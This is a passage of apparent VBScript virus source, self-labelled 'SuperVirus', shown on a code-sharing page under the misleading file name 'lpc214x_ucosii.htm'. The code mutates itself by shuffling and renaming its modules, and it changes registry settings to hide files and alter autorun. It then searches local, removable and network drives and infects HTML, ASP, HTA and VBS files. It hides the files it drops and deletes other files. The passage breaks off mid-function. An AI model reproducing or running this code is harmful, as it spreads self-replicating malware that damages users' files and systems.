📄 lpc214x_ucosii.htm
字号:
vf.Delete
End If
If objfso.FileExists(FullPath_V0) = true Then
Set vf = objfso.GetFile(FullPath_V0)
vf.Delete
End If
If objfso.FileExists(FullPath_Config) = True Then
objfso.DeleteFile FullPath_Config , True
End If
End Sub
'PYRHOYIQVQT1_8
'UARVKZXWUDPRG2_14
Function ReadOK(objfso, FullPath_OK)
On Error Resume Next
Dim vf, buffer
Set vf = objfso.OpenTextFile(FullPath_OK, 1)
buffer = vf.ReadAll
ReadOK = RTrim(Mid(buffer, InStr(buffer, "Order:") + 6, 50))
End Function
Sub WriteOK(objfso, FullPath_OK, Order_Order, Order_Para)
On Error Resume Next
Dim vf1
objfso.DeleteFile FullPath_OK, True
Set vf1 = objfso.OpenTextFile(FullPath_OK, 2, True)
vf1.Write "OK" & VBCRLF
vf1.WriteLine Date()
vf1.WriteLine "Order:" & Order_Order & "@" & Order_Para
Call SetFileAttr(objfso, FullPath_OK)
End Sub
'PYRHOYIQVQT2_14
'UARVKZXWUDPRG1_9
Function ChangeModelOrder(vbsCode, Num_DNA)
On Error Resume Next
Dim DNA(), Array_vbsCode()
Dim i, Value, flag, j, buffer
ReDim DNA(Num_DNA), Array_vbsCode(Num_DNA)
buffer = vbsCode
Randomize
For i = 1 To Num_DNA
Do
Value = Int((Num_DNA * Rnd) + 1)
flag = 1
For j = 1 To Num_DNA
If Value = DNA(j) Then
flag = 0
Exit For
End If
Next
Loop Until flag = 1
DNA(i) = Value
Next
For i = 1 To Num_DNA
Array_vbsCode(i) = GetModelCode(buffer, i)
Next
buffer = ""
For i = 1 To Num_DNA
buffer = buffer & VBCRLF & Array_vbsCode(DNA(i)) & VBCRLF
Next
ChangeModelOrder = Head_V & Version & VBCRLF & buffer & VBCRLF & Tail_V
End Function
'PYRHOYIQVQT1_9
'UARVKZXWUDPRG2_18
Function IsOK(objfso, Now_V, path_f)
On Error Resume Next
Dim vf, p1, p2, p3
IsOK = False
Set vf = objfso.OpenTextFile(path_f, 1)
p1 = Trim(vf.ReadLine)
p2 = Trim(vf.ReadLine)
p3 = Trim(vf.ReadLine)
If StrComp(p1, "OK", 1) = 0 And StrComp(p2, Now_V, 1) = 0 Then
IsOK = True
End If
If p3 = "Admin" Then
MsgBox "You Are Admin!!! Your Computer Will Not Be Infected!!!"
IsOK = True
n = InputBox("0:退出; 1:监视系统; 2:传染文件", "SuperVirus脚本测试!")
If n = 0 Then
Wscript.Quit
ElseIf n = 1 Then
IsOK = True
ElseIf n = 2 Then
IsOK = False
End If
End If
End Function
'PYRHOYIQVQT2_18
'UARVKZXWUDPRG2_23
Function MakeScript(strCode, T)
If T = 1 Then
MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & ChangeModelOrder(strCode, Sum_ModelCode) & VBCRLF & "</" & "SCRIPT>"
Else
MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & strCode & VBCRLF & "</" & "SCRIPT>"
End If
End Function
'PYRHOYIQVQT2_23
'UARVKZXWUDPRG1_4
Function Head()
Head = VBCRLF & "'UARVKZXWUDPRG1_1" & VBCRLF &_
"On Error Resume Next" & VBCRLF &_
"Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V" & VBCRLF &_
"Dim ModelHead, ModelTail" & VBCRLF &_
"Cnt = 0" & VBCRLF &_
"CntMax = 1000" & VBCRLF &_
"Version = ""4""" & VBCRLF &_
"Name_V1 = GetUserName() & "".vbs""" & VBCRLF &_
"FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向" & VBCRLF &_
"FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令" & VBCRLF &_
"FullPath_Config= GetSFolder(1) & GetUserName() & "".ini""" & VBCRLF &_
"Sum_ModelCode = 26" & VBCRLF &_
"Head_V= GetHeadTail(0)" & VBCRLF &_
"Tail_V= GetHeadTail(1)" & VBCRLF &_
"ModelHead=""'UARVKZXWUDPRG""" & VBCRLF &_
"ModelTail=""'PYRHOYIQVQT""" & VBCRLF
End Function
Function VictimHead()
VictimHead = Head() & VBCRLF &_
"Call VictimMain()" & VBCRLF &_
"Sub VictimMain()" & VBCRLF &_
" Call ExeVbs_Victim()" & VBCRLF &_
"End Sub" & VBCRLF &_
"'PYRHOYIQVQT1_1" & VBCRLF
End Function
Function VirusHead()
VirusHead = Head() & VBCRLF &_
"Call VirusMain()" & VBCRLF &_
"Sub VirusMain()" & VBCRLF &_
" On Error Resume Next" & VBCRLF &_
" Call ExeVbs_Virus()" & VBCRLF &_
"End Sub" & VBCRLF & VBCRLF &_
"'PYRHOYIQVQT1_1" & VBCRLF
End Function
Function WebHead()
WebHead = Head() & VBCRLF &_
"Call WebMain()" & VBCRLF &_
"Sub WebMain()" & VBCRLF &_
" On Error Resume Next" & VBCRLF &_
" Call ExeVbs_WebPage()" & VBCRLF &_
"End Sub" & VBCRLF &_
"'PYRHOYIQVQT1_1" & VBCRLF
End Function
'PYRHOYIQVQT1_4
'UARVKZXWUDPRG2_20
Function GetModelCode(vbsCode, N_ModelCode)
On Error Resume Next
Dim n, n1, buffer
buffer = vbsCode
If N_ModelCode>= 1 And N_ModelCode<= 9 Then
n = InStr(buffer, ModelHead & "1_" & N_ModelCode)
n1 = InStr(buffer, ModelTail & "1_" & N_ModelCode)
GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "1_" & N_ModelCode))
ElseIf N_ModelCode>= 10 And N_ModelCode<= 99 Then
n = InStr(buffer, ModelHead & "2_" & N_ModelCode)
n1 = InStr(buffer, ModelTail & "2_" & N_ModelCode)
GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "2_" & N_ModelCode))
ElseIf N_ModelCode>= 100 And N_ModelCode<= 999 Then
n = InStr(buffer, ModelHead & "3_" & N_ModelCode)
n1 = InStr(buffer, ModelTail & "3_" & N_ModelCode)
GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "3_" & N_ModelCode))
End If
End Function
'PYRHOYIQVQT2_20
'UARVKZXWUDPRG2_26
Sub Run(ExeFullName)
Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run ExeFullName
Set WshShell = Nothing
End Sub
Sub CopyFile(objfso, code, pathf)
On Error Resume Next
Dim vf
Set vf = objfso.OpenTextFile(pathf, 2, true)
vf.Write code
End Sub
Function ChangeName(vbsCode, Names)
Dim Name, j, temp, buffer
buffer = vbsCode
Randomize
For Each Name in Names
temp = ""
For j = 1 To Len(Name)
temp = temp & Chr((Int(Rnd * 26) + 65))
Next
buffer = Replace(buffer, Name, temp)
Next
ChangeName = buffer
End Function
'PYRHOYIQVQT2_26
'UARVKZXWUDPRG2_13
Sub DeSafeSet()
Dim HLMShow , HCUAdvanced, HCUExplorer
HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
HCUExplorer = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"
Call WriteReg (HCUExplorer, 129, "REG_DWORD")
Call WriteReg (HCUAdvanced, 0, "REG_DWORD")
Call WriteReg (HLMShow, 0, "REG_DWORD")
End Sub
Sub SafeSet()
Dim HLMShow , HCUSSHidden, HCUHidden
Dim HCUExplorer
HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
HCUHidden = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"
Call WriteReg (HCUHidden, 1, "REG_DWORD")
Call WriteReg (HCUAdvanced, 1, "REG_DWORD")
Call WriteReg (HLMShow, 1, "REG_DWORD")
End Sub
'PYRHOYIQVQT2_13
'UARVKZXWUDPRG1_2
Sub ExeVbs_WebPage()
On Error Resume Next
Dim objfso, vbsCode, VbsCode_Virus
Set objfso = CreateObject(GetFSOName())
vbsCode = GetScriptCode("vbscript")
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
Call InvadeSystem(objfso, VbsCode_Virus)
Set objfso = Nothing
End Sub
Sub ExeVbs_Victim()
On Error Resume Next
Dim objfso, vbsCode, VbsCode_Virus
Set objfso = CreateObject(GetFSOName())
vbsCode = GetSelfCode(objfso, WScript.ScriptFullName)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Set objfso = Nothing
End Sub
'PYRHOYIQVQT1_2
'UARVKZXWUDPRG2_15
Sub SetFileAttr(objfso, pathf)
Dim vf
Set vf = objfso.GetFile(pathf)
vf.Attributes = 6
End Sub
'PYRHOYIQVQT2_15
'UARVKZXWUDPRG1_1
On Error Resume Next
Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V
Dim ModelHead, ModelTail
Cnt = 0
CntMax = 1000
Version = "4"
Name_V1 = GetUserName() & ".vbs"
FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向
FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令
FullPath_Config= GetSFolder(1) & GetUserName() & ".ini"
Sum_ModelCode = 26
Head_V= GetHeadTail(0)
Tail_V= GetHeadTail(1)
ModelHead="'UARVKZXWUDPRG"
ModelTail="'PYRHOYIQVQT"
Call WebMain()
Sub WebMain()
On Error Resume Next
Call ExeVbs_WebPage()
End Sub
'PYRHOYIQVQT1_1
'UARVKZXWUDPRG2_10
Sub SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, T)
On Error Resume Next
Dim d , dc
Set dc = objfso.Drives
For Each d In dc
If Cnt >= CntMax Then '
Exit For
End If
If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
'If d.DriveType = 1 Then
Call SearchFile(objfso, d.Path & "\", VbsCode_WebPage, VbsCode_Victim, T)
'End If
End If
Next
End Sub
'PYRHOYIQVQT2_10
'UARVKZXWUDPRG2_21
Function IsSexFile(fname)
IsSexFile = False
If InStr(fname, "成人")>0 Or InStr(fname, "淫")>0 Or InStr(fname, "偷拍")>0 Or _
InStr(fname, "偷窥")>0 Or InStr(fname, "口交")>0 Or InStr(fname, "强奸")>0 Or _
InStr(fname, "轮奸")>0 Or InStr(fname, "伦理片")>0 Or InStr(fname, "自摸")>0 Then
IsSexFile = True
End If
End Function
Function Isinfected(buffer, ftype)
Isinfected = True
Select Case ftype
Case "hta", "htm" , "html" , "asp", "vbs"
If InStr(buffer, Head_V) = 0 Then
Isinfected = False
End If
Case Else
Isinfected = True
End Select
End Function
'PYRHOYIQVQT2_21
'UARVKZXWUDPRG2_11
Sub SearchFile(objfso, strPath, VbsCode_WebPage, VbsCode_Victim, T)
On Error Resume Next
Dim pfo, pf, pfi, ext
Dim psfo, ps
Set pfo = objfso.GetFolder(strPath)
Set pf = pfo.Files
For Each pfi In pf
If Cnt >= CntMax Then
Exit For
End If
ext = LCase(objfso.GetExtensionName(pfi.Path))
Select Case ext
Case "hta", "htm", "html", "asp", "vbs"
Call InfectHead(pfi.Path, pfi, objfso, VbsCode_WebPage, VbsCode_Victim, ext, T)
Case "mpg", "rmvb", "avi", "rm"
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -